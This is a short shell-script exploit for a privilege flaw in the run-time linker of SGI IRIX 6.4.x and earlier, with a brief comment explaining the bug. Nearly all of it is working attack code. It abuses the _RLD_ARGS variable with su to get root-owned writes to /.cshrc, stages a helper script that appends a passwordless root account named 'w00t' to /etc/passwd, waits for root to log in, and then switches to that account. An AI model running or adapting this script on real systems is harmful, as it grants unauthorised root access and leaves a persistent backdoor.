#!/bin/sh
# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit
# =======================================================================
# The IRIX run-time linker on all versions prior to 6.5 does not properly
# scrub environment variables when executing binaries with privilege or
# capabilities. A malicious user can leverage this to create files as the
# "root" user and partially control the contents.
#
# -- HackerFantastic (https://hacker.house)
#
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh
chmod 755 /tmp/.x.sh
_RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su
last -3 root
echo "[ waiting 5mins for root to login..."
sleep 300
su - w00t